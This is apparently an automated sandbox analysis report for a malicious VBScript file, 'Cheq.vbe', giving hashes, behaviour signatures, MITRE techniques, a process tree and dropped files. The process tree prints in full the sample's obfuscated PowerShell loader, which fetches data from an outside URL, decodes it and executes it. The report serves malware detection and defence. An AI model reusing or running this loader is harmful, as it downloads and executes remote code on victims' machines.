407cde8101a3f04d2e4c9c632c771a3f3fc5db48c14c0ad85f76e8ae50fea6c1

General

Target

Cheq.vbe
Size

720KB
MD5

08916398d60045637fa6b2f5d5ef89e6
SHA1

2f1bd5cc4c5649fb7e034e48861de256b76ce06f
SHA256

407cde8101a3f04d2e4c9c632c771a3f3fc5db48c14c0ad85f76e8ae50fea6c1
SHA512

a036b6b80070a7f7928b7ed521572ff7b8401236c604c53aafe91d9862215e1df897ba84a380eb78da996d760b4a29f5642c60b68d0df45e418b8c726d6b8c58
SSDEEP

6144:TsyS5Hz0L9jTGquGSqCG2NPnbY/0M7xxMldTSsp3vraSEPW/snrOLNC51gdQl7VB:vCRT+WPxm3pfqiMwc/MVqAd+O

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
52	1768	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1768	powershell.exe
1768	powershell.exe
4620	powershell.exe
4620	powershell.exe
4620	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 5020 wrote to memory of 1768	5020	WScript.exe	99
PID 5020 wrote to memory of 1768	5020	WScript.exe	99
PID 1768 wrote to memory of 2448	1768	powershell.exe	101
PID 1768 wrote to memory of 2448	1768	powershell.exe	101
PID 1768 wrote to memory of 4620	1768	powershell.exe	102
PID 1768 wrote to memory of 4620	1768	powershell.exe	102
PID 1768 wrote to memory of 4620	1768	powershell.exe	102
PID 4620 wrote to memory of 4072	4620	powershell.exe	103
PID 4620 wrote to memory of 4072	4620	powershell.exe	103
PID 4620 wrote to memory of 4072	4620	powershell.exe	103

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Cheq.vbe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Printermanualens = 1;$Kkkensalt='Sub';$Kkkensalt+='strin';$Kkkensalt+='g';Function Pastoraling($Delegationsrejsernes){$Buur=$Delegationsrejsernes.Length-$Printermanualens;For($Bilaciniate=2;$Bilaciniate -lt $Buur;$Bilaciniate+=3){$Mrkepen+=$Delegationsrejsernes.$Kkkensalt.Invoke( $Bilaciniate, $Printermanualens);}$Mrkepen;}function Coloplication($Acetoacetic){& ($Traditionalizes) ($Acetoacetic);}$Grdede=Pastoraling ' vM pofezPoi ulK.lKoa /Fo5,m.Pl0Ko ,(InWCoi GnP.dBroPrw.as.m DeN FTFi D,1 r0Pr.Un0.e; p MeWMeifjnba6Ac4Re;E Lrx.o6br4Tu;.u D.rOvv V:Bi1Co2Rb1N..S 0 L) . UnG,ne dc kkoroC./Un2F 0 U1,y0Un0Ca1 S0C 1 v MnFgei.drPreUtf ,oA,xas/el1 N2B.1 K.,t0sp ';$Soundstripe=Pastoraling ' uUKnsBaerorTy-HiA pgAde,enPrtK, ';$Supercharging=Pastoraling 'InhIst FtEpp s R:.u/am/.oaFulVaiStaMamCr. .iR rS,/ SP ,nureSps Ht .e,bs g.GalimzD,hCh ';$Thyiad81=Pastoraling ',u>De ';$Traditionalizes=Pastoraling 'PhiSke ex i ';$Tilkastningerne='Skrivearealers';$Brugerbehovet = Pastoraling '.fe Cc Lh .o P to%plaTep FpSid fa ,tZ,a.i% t\DeUTrnS.cUno.sm,wp.aiPrlAmeRad S.ApSUraIml.o Ko&B,&A Foe,ocsehDio u K,tId ';Coloplication (Pastoraling ' $Dag Ll.uoIbbFla ,lNy:,zR yeChwUdaMosTeh OeStdTe= f(Sec,omTodMi C./,ucG. S$KoBKurKlu .g.heAurBrbF,e ,hReosvvUneC,tEk)zy ');Coloplication (Pastoraling ' F$B.gSal.loCobSua cl ,:ApU AdsplSlyTadOrsDok CoAln ,sBao GnGaaAin ,twhe rC,sPo1Lo8De9fe=Se$ S eu.mphueR.rInchjh Fa DrB g miDen Ag J.A s.dpFolBoiVitS (A.$,aTPahKlyliiTra ldse8Be1 M) U ');$Supercharging=$Udlydskonsonanters189[0];$Apophlegm= (Pastoraling ' A$,agUnl osobInaL lEv:,oPArr.ieTjsKotc.iVigSue,ifTry ,l .dYmt.veF.2 ,0,e8Re=AnN,oe Sw,a-S,OFobRajRee.lc ,tDy BiSTry sFrtLeeJ,mch.UnNS eLitig.NoW eB,bSuC TlPhiphe ,n Gt');$Apophlegm+=$Rewashed[1];Coloplication ($Apophlegm);Coloplication (Pastoraling '.r$R,PTrrdieflsUntRdiVggTie f Dy AlPidTctBreD 2Pi0Un8 U.B HM.eMoa kdIne FrB s P[T $stSI.oSpuFynModbisSltSyr SiGapCyeSt] ,=La$FuGStr ,dI.e BdAfe.a ');$Forelbigt=Pastoraling 'Pe$ IP,lrree CsPrtUniIngObeOlfI yScl.hdF,tPae,r2 .0 G8gr.boD UoRiwHanTrlPro ,a ,d.rF LiShlKteMa( ,$HlSBauDipSmeFor ocArhUnaHorC,g.nielnTag N,O,$LuT,ei .lStlkraSkglse C)Ko ';$Tillage=$Rewashed[0];Coloplication (Pastoraling 'Pa$P,gKnlJaoK.bDaaAflPr:ByWunaFirChpSoaS.tSthV,s b=Mo(F.TPre KsP,tTe-,nP Ha t ,hRe .a$ GTFei SlPrlMyaBegH.ePh)Fi ');while (!$Warpaths) {Coloplication (Pastoraling 'Tr$regL,lS o .bLaaUnlRa:A LM aDar.fdBreMyrNyeGylThl,eiS.t heC =Kl$BotFkrEcuIleTu ') ;Coloplication $Forelbigt;Coloplication (Pastoraling 'S STot vaSurSetT,-WaSHolGue KeH.pSp De4Ge ');Coloplication (Pastoraling ' .$AbgUnlQuoa.b GaFllRe:maWOpa vrPipO.aBut .hAnsMa= r(,eT ,eHysHyt ,-tuPv.a htCyhba p$MeTMoiDil.flAla og Ce n) . ') ;Coloplication (Pastoraling 'La$ThgMylSkoR,bInaBylC :u UAfnEuwHehFui Sp otKy=Fo$R gD,lTro CbViaMal a:MaM.oeNydD i EnFrd DeSehAeaTov .e HrSteManT +pt+ u%,i$ CUO.d ,lDky Ad s tkSpoAunA,sJeo,tnDea.nn tttheO,rRosTe1He8sk9A .F,c loAbu Ln rt,o ') ;$Supercharging=$Udlydskonsonanters189[$Unwhipt];}$Umbilical=321149;$Fjerkrslagteris=27241;Coloplication (Pastoraling ' $L.g GlL oBab Ea.ulTy: PVel auFotKio Bl,raSttNor fyRh L=,g StG EeK.tKe-BrC aoFinf,tt,eSenSat a Ku$S TCai Fli,l oa MgO eTi ');Coloplication (Pastoraling 'no$Beg HlG.ovabSaaAelDe:KoDDeeOrt iaD,iH.l,rpLarKaoRij,ueI,k.atAseDar,ieUnn ndKleUts t Dy= D Fl[BuSpuy,osovtU.e Ampi.BoC.aoT.n .vRee.nrDate,]An: C:UnFkarCaokamN.B a s ,ePe6Pu4 USNot nrB iInnReg r(Op$CrPVil.fuIntTuoFrl,la t crKay,y)Gr ');Coloplication (Pastoraling ' A$Iog,alFoo SbKbaNol,n: FwNoi DnUdgTioHvvEkeH,rInsb M,= S j[ SSToyChs .t BeDimCa.S,T.lehex.ztRh.LaE nPucMioB,dUniTenhugRu]vg:Da:OvA .SDiC FINaI e. yG.ke StCaSu t.er tiR n,sgVi(g.$A,D DeDktgua FiTel,ip,pr so sj,ie SkSatT.e.er PeUnnPhdC,e Ss n)Sa ');Coloplication (Pastoraling ' P$U,g PlP oG.bMaagelph:.hUSnnPrlAeuDrsKrtS fDiuMelAalStya =Al$ Hw .i .nTig ooFivR,e .r rsMa.SnsG,u Hb eshit.lrRri,anSagPu(U,$,rU ,m.nb iiBalUdi Wc eaMul i, $ nF.jj TeCyr SkB.rH,s klPaaHogBrtKoeSarSti FsCo)Wa ');Coloplication $Unlustfully;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Uncompiled.Sal && echo t"
    3⤵
    PID:2448
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Printermanualens = 1;$Kkkensalt='Sub';$Kkkensalt+='strin';$Kkkensalt+='g';Function Pastoraling($Delegationsrejsernes){$Buur=$Delegationsrejsernes.Length-$Printermanualens;For($Bilaciniate=2;$Bilaciniate -lt $Buur;$Bilaciniate+=3){$Mrkepen+=$Delegationsrejsernes.$Kkkensalt.Invoke( $Bilaciniate, $Printermanualens);}$Mrkepen;}function Coloplication($Acetoacetic){& ($Traditionalizes) ($Acetoacetic);}$Grdede=Pastoraling ' vM pofezPoi ulK.lKoa /Fo5,m.Pl0Ko ,(InWCoi GnP.dBroPrw.as.m DeN FTFi D,1 r0Pr.Un0.e; p MeWMeifjnba6Ac4Re;E Lrx.o6br4Tu;.u D.rOvv V:Bi1Co2Rb1N..S 0 L) . UnG,ne dc kkoroC./Un2F 0 U1,y0Un0Ca1 S0C 1 v MnFgei.drPreUtf ,oA,xas/el1 N2B.1 K.,t0sp ';$Soundstripe=Pastoraling ' uUKnsBaerorTy-HiA pgAde,enPrtK, ';$Supercharging=Pastoraling 'InhIst FtEpp s R:.u/am/.oaFulVaiStaMamCr. .iR rS,/ SP ,nureSps Ht .e,bs g.GalimzD,hCh ';$Thyiad81=Pastoraling ',u>De ';$Traditionalizes=Pastoraling 'PhiSke ex i ';$Tilkastningerne='Skrivearealers';$Brugerbehovet = Pastoraling '.fe Cc Lh .o P to%plaTep FpSid fa ,tZ,a.i% t\DeUTrnS.cUno.sm,wp.aiPrlAmeRad S.ApSUraIml.o Ko&B,&A Foe,ocsehDio u K,tId ';Coloplication (Pastoraling ' $Dag Ll.uoIbbFla ,lNy:,zR yeChwUdaMosTeh OeStdTe= f(Sec,omTodMi C./,ucG. S$KoBKurKlu .g.heAurBrbF,e ,hReosvvUneC,tEk)zy ');Coloplication (Pastoraling ' F$B.gSal.loCobSua cl ,:ApU AdsplSlyTadOrsDok CoAln ,sBao GnGaaAin ,twhe rC,sPo1Lo8De9fe=Se$ S eu.mphueR.rInchjh Fa DrB g miDen Ag J.A s.dpFolBoiVitS (A.$,aTPahKlyliiTra ldse8Be1 M) U ');$Supercharging=$Udlydskonsonanters189[0];$Apophlegm= (Pastoraling ' A$,agUnl osobInaL lEv:,oPArr.ieTjsKotc.iVigSue,ifTry ,l .dYmt.veF.2 ,0,e8Re=AnN,oe Sw,a-S,OFobRajRee.lc ,tDy BiSTry sFrtLeeJ,mch.UnNS eLitig.NoW eB,bSuC TlPhiphe ,n Gt');$Apophlegm+=$Rewashed[1];Coloplication ($Apophlegm);Coloplication (Pastoraling '.r$R,PTrrdieflsUntRdiVggTie f Dy AlPidTctBreD 2Pi0Un8 U.B HM.eMoa kdIne FrB s P[T $stSI.oSpuFynModbisSltSyr SiGapCyeSt] ,=La$FuGStr ,dI.e BdAfe.a ');$Forelbigt=Pastoraling 'Pe$ IP,lrree CsPrtUniIngObeOlfI yScl.hdF,tPae,r2 .0 G8gr.boD UoRiwHanTrlPro ,a ,d.rF LiShlKteMa( ,$HlSBauDipSmeFor ocArhUnaHorC,g.nielnTag N,O,$LuT,ei .lStlkraSkglse C)Ko ';$Tillage=$Rewashed[0];Coloplication (Pastoraling 'Pa$P,gKnlJaoK.bDaaAflPr:ByWunaFirChpSoaS.tSthV,s b=Mo(F.TPre KsP,tTe-,nP Ha t ,hRe .a$ GTFei SlPrlMyaBegH.ePh)Fi ');while (!$Warpaths) {Coloplication (Pastoraling 'Tr$regL,lS o .bLaaUnlRa:A LM aDar.fdBreMyrNyeGylThl,eiS.t heC =Kl$BotFkrEcuIleTu ') ;Coloplication $Forelbigt;Coloplication (Pastoraling 'S STot vaSurSetT,-WaSHolGue KeH.pSp De4Ge ');Coloplication (Pastoraling ' .$AbgUnlQuoa.b GaFllRe:maWOpa vrPipO.aBut .hAnsMa= r(,eT ,eHysHyt ,-tuPv.a htCyhba p$MeTMoiDil.flAla og Ce n) . ') ;Coloplication (Pastoraling 'La$ThgMylSkoR,bInaBylC :u UAfnEuwHehFui Sp otKy=Fo$R gD,lTro CbViaMal a:MaM.oeNydD i EnFrd DeSehAeaTov .e HrSteManT +pt+ u%,i$ CUO.d ,lDky Ad s tkSpoAunA,sJeo,tnDea.nn tttheO,rRosTe1He8sk9A .F,c loAbu Ln rt,o ') ;$Supercharging=$Udlydskonsonanters189[$Unwhipt];}$Umbilical=321149;$Fjerkrslagteris=27241;Coloplication (Pastoraling ' $L.g GlL oBab Ea.ulTy: PVel auFotKio Bl,raSttNor fyRh L=,g StG EeK.tKe-BrC aoFinf,tt,eSenSat a Ku$S TCai Fli,l oa MgO eTi ');Coloplication (Pastoraling 'no$Beg HlG.ovabSaaAelDe:KoDDeeOrt iaD,iH.l,rpLarKaoRij,ueI,k.atAseDar,ieUnn ndKleUts t Dy= D Fl[BuSpuy,osovtU.e Ampi.BoC.aoT.n .vRee.nrDate,]An: C:UnFkarCaokamN.B a s ,ePe6Pu4 USNot nrB iInnReg r(Op$CrPVil.fuIntTuoFrl,la t crKay,y)Gr ');Coloplication (Pastoraling ' A$Iog,alFoo SbKbaNol,n: FwNoi DnUdgTioHvvEkeH,rInsb M,= S j[ SSToyChs .t BeDimCa.S,T.lehex.ztRh.LaE nPucMioB,dUniTenhugRu]vg:Da:OvA .SDiC FINaI e. yG.ke StCaSu t.er tiR n,sgVi(g.$A,D DeDktgua FiTel,ip,pr so sj,ie SkSatT.e.er PeUnnPhdC,e Ss n)Sa ');Coloplication (Pastoraling ' P$U,g PlP oG.bMaagelph:.hUSnnPrlAeuDrsKrtS fDiuMelAalStya =Al$ Hw .i .nTig ooFivR,e .r rsMa.SnsG,u Hb eshit.lrRri,anSagPu(U,$,rU ,m.nb iiBalUdi Wc eaMul i, $ nF.jj TeCyr SkB.rH,s klPaaHogBrtKoeSarSti FsCo)Wa ');Coloplication $Unlustfully;"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4620
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Uncompiled.Sal && echo t"
      4⤵
      PID:4072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3768 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
1⤵
PID:3688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mhu2vbke.g3m.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Uncompiled.Sal

Filesize
453KB

MD5
2f46600b754c21c06b2a02bbb84fa382

SHA1
41867553b5b28bd3df054592c3e5c790b10ae0fe

SHA256
5d52bd8487ed19051c693185ef03b8db4a0f037449c7e8b6545bdd82d3d2bd2b

SHA512
6014fff34c2f0151d7c9f2e40becc4b4d646450f05866246e0e4162658f48f309a3a5214aea717f3605c733a194f88d24f2afeb94337482749f9dfb359365038

Download Submit
memory/1768-0-0x00007FFFD5D83000-0x00007FFFD5D85000-memory.dmp

Filesize
8KB

Download
memory/1768-1-0x0000018662990000-0x00000186629B2000-memory.dmp

Filesize
136KB

Download
memory/1768-11-0x00007FFFD5D80000-0x00007FFFD6841000-memory.dmp

Filesize
10.8MB

Download
memory/1768-12-0x00007FFFD5D80000-0x00007FFFD6841000-memory.dmp

Filesize
10.8MB

Download
memory/1768-13-0x00007FFFD5D80000-0x00007FFFD6841000-memory.dmp

Filesize
10.8MB

Download
memory/1768-32-0x00007FFFD5D80000-0x00007FFFD6841000-memory.dmp

Filesize
10.8MB

Download
memory/1768-31-0x00007FFFD5D83000-0x00007FFFD5D85000-memory.dmp

Filesize
8KB

Download
memory/4620-19-0x0000000004DF0000-0x0000000004E56000-memory.dmp

Filesize
408KB

Download
memory/4620-35-0x0000000007660000-0x0000000007CDA000-memory.dmp

Filesize
6.5MB

Download
memory/4620-26-0x00000000057C0000-0x0000000005B14000-memory.dmp

Filesize
3.3MB

Download
memory/4620-18-0x0000000004D50000-0x0000000004D72000-memory.dmp

Filesize
136KB

Download
memory/4620-17-0x0000000004F30000-0x0000000005558000-memory.dmp

Filesize
6.2MB

Download
memory/4620-33-0x0000000005D50000-0x0000000005D6E000-memory.dmp

Filesize
120KB

Download
memory/4620-34-0x0000000005E20000-0x0000000005E6C000-memory.dmp

Filesize
304KB

Download
memory/4620-20-0x00000000056D0000-0x0000000005736000-memory.dmp

Filesize
408KB

Download
memory/4620-36-0x00000000062C0000-0x00000000062DA000-memory.dmp

Filesize
104KB

Download
memory/4620-37-0x0000000007080000-0x0000000007116000-memory.dmp

Filesize
600KB

Download
memory/4620-38-0x0000000006FE0000-0x0000000007002000-memory.dmp

Filesize
136KB

Download
memory/4620-39-0x0000000008290000-0x0000000008834000-memory.dmp

Filesize
5.6MB

Download
memory/4620-16-0x0000000002440000-0x0000000002476000-memory.dmp

Filesize
216KB

Download
memory/4620-42-0x0000000008840000-0x000000000D06A000-memory.dmp

Filesize
72.2MB

Download

Analysis

Sharing